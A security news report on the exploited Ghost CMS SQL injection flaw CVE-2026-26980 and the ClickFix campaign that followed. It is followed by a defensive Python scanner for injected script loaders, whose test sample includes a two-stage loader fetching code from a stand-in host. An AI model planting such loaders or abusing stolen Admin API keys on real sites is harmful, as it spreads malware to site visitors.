Critical Ghost CMS Vulnerability Exposes Over 700 Websites to Cyber Attacks

A significant vulnerability in the Ghost content management system, designated as CVE-2026-26980, has been exploited in a large-scale cyber campaign that has compromised over 700 websites. This breach includes platforms linked to prominent institutions such as Harvard University, the University of Oxford, and DuckDuckGo. Security researchers have indicated that the attacks utilized weaknesses in the Ghost CMS to inject malicious JavaScript code aimed at facilitating ClickFix malware attacks.

Ongoing Exploitation of Unpatched Systems

The attacks were investigated by the Chinese cybersecurity firm QiAnXin and its XLab research team, which has raised alarms about threat actors actively targeting unpatched installations of Ghost CMS in a “large-scale poisoning” campaign. The vulnerability was disclosed and patched in February 2026 with the release of version 6.19.1 of the Ghost CMS. This open-source platform is widely used for blogging, digital publishing, newsletters, and memberships, reportedly powering over 100,000 websites globally.

The Ghost CMS vulnerability is categorized as an SQL injection flaw affecting the platform’s Content API. Researchers from SentinelOne previously warned that this vulnerability could allow unauthenticated attackers to extract sensitive data directly from a site’s database, including authentication tokens, website content, and user credentials. The flaw has been assigned a CVSS severity score of 9.4, underscoring the serious risks associated with CVE-2026-26980. It was reportedly discovered by Anthropic using its Claude AI system.

What makes this vulnerability particularly dangerous is its potential to expose a site’s Admin API Key. Once attackers obtain this key, they can misuse Ghost’s Admin API to modify published articles and inject malicious code into legitimate websites without authorization.

Timeline of Exploitation

According to QiAnXin XLab, attackers began exploiting CVE-2026-26980 shortly after the security patch became publicly available. Investigators noted that a DLL file involved in the campaign had a compilation timestamp dated February 16, 2026—the same day the patch for the Ghost CMS vulnerability was announced. The malicious activity was first detected on May 7, 2026, and by early May, researchers had already identified hundreds of compromised websites running the Ghost CMS.

Ultimately, more than 700 websites across various industries were discovered to be affected. The victims included organizations operating in sectors such as artificial intelligence, software development, blockchain, cybersecurity, fintech, media, SaaS, and higher education. Nearly half of the compromised websites were personal blogs or independently operated sites, but many belonged to major institutions and technology-focused organizations.

QiAnXin reported that while many victims were notified about the compromises, the majority failed to respond to the alerts. Researchers indicated that at least two groups are actively conducting such poisoning operations, with some sites becoming battlegrounds for competition between the two parties, leading to different malicious code being implanted within a single day.

Mechanism of Malicious JavaScript Injection

The attackers exploited the Ghost CMS vulnerability to tamper with website articles by appending malicious JavaScript loaders to the bottom of pages. These loaders were designed to facilitate ClickFix attacks—a growing social engineering tactic that tricks users into manually executing malware on their systems. The injected code functioned as a two-stage loader that retrieved additional payloads at runtime from an external domain identified as “clo4shara[.]xyz/11z77u3.php.” This infrastructure provided attackers with the flexibility to swap payloads while maintaining the same loader framework across multiple compromised Ghost CMS sites.

QiAnXin explained that the PHP script acted as a traffic distribution and cloaking system powered by Adspect, a commercial cloaking service. The script collected browser fingerprinting data from visitors and selectively redirected targets based on predefined rules. Directly accessing clo4shara[.]xyz/11z77u3.php reveals a piece of code that functions as a typical traffic distribution script. Its core function is to gather various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions.

The cloaking mechanism enabled attackers to evade detection by ensuring that only intended victims received malicious payloads, while automated scanners and crawlers were shown harmless web content instead.
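The injection described in the two preceding sections (a loader appended to the article body that fetches its next stage from an off-site `.php` endpoint) leaves a footprint a site operator can scan for in rendered post HTML. The following is an added example, not code from the article or from the Ghost project or QiAnXin: it parses a post's HTML with the standard-library HTML parser, collects every `<script>` element, and flags any that loads from, or references, a host outside an operator-maintained allowlist, or that creates a script element at runtime the way a two-stage loader does. The allowlist hosts, the `evil-loader.example` domain and both sample posts are constructed placeholders (the article's real indicator is given defanged above and is deliberately not used here).

```python
"""Flag injected third-party script loaders in rendered Ghost post HTML (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the site's own theme is known to load scripts from.
ALLOWED_HOSTS = {"blog.example", "cdn.example"}

# Absolute URLs inside inline script text; stops at quotes, whitespace and brackets.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class ScriptCollector(HTMLParser):
    """Collect every <script> element with its src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # one dict per <script>: src, inline text, source line
        self._current = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            attributes = dict(attrs)
            self._current = {"src": attributes.get("src"), "inline": "", "line": self.getpos()[0]}
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so this captures inline JS.
        if self._current is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self._current["inline"] = "".join(self._buf)
            self.scripts.append(self._current)
            self._current = None


def _host(url):
    # urlparse handles absolute and protocol-relative (//host/path) URLs; relative paths give "".
    return (urlparse(url).hostname or "").lower()


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings, one per <script> that looks like an injected loader."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for script in parser.scripts:
        reasons = []
        if script["src"]:
            host = _host(script["src"])
            if host and host not in allowed_hosts:
                reasons.append(f"external src host {host}")
        for url in URL_RE.findall(script["inline"]):
            host = _host(url)
            if host and host not in allowed_hosts:
                reasons.append(f"inline reference to {host}")
        # Runtime script-element creation is the hallmark of a multi-stage loader.
        if "createElement('script')" in script["inline"].replace('"', "'"):
            reasons.append("runtime script injection (createElement)")
        if reasons:
            findings.append({"line": script["line"], "reasons": reasons})
    return findings


# Constructed sample: a post as the theme renders it, with only first-party scripts.
CLEAN_POST = """<html><body>
<article><h1>Release notes</h1><p>Nothing unusual here.</p></article>
<script src="/assets/js/app.js"></script>
<script src="https://cdn.example/analytics.js"></script>
</body></html>"""

# Constructed sample: the same post with a two-stage loader appended after the article.
INJECTED_POST = CLEAN_POST.replace(
    "</article>",
    "</article>\n<script>(function(){var s=document.createElement('script');"
    "s.src='https://evil-loader.example/stage2.php?v='+Date.now();"
    "document.body.appendChild(s);})();</script>",
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_POST), ("injected", INJECTED_POST)):
        print(name, find_suspicious_scripts(page))
```

In practice the same function can be run over the `html` field of every post returned by the site's own read-only Content API, or over a nightly crawl of rendered pages, and the diff of findings between runs is the alert: a loader that appears at the bottom of many posts on the same day matches the pattern the article describes. The allowlist is the part that needs per-site tuning, since a theme that legitimately loads from a third-party CDN will otherwise produce noise.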

For further details on this vulnerability, refer to the original reporting source: thecyberexpress.com.
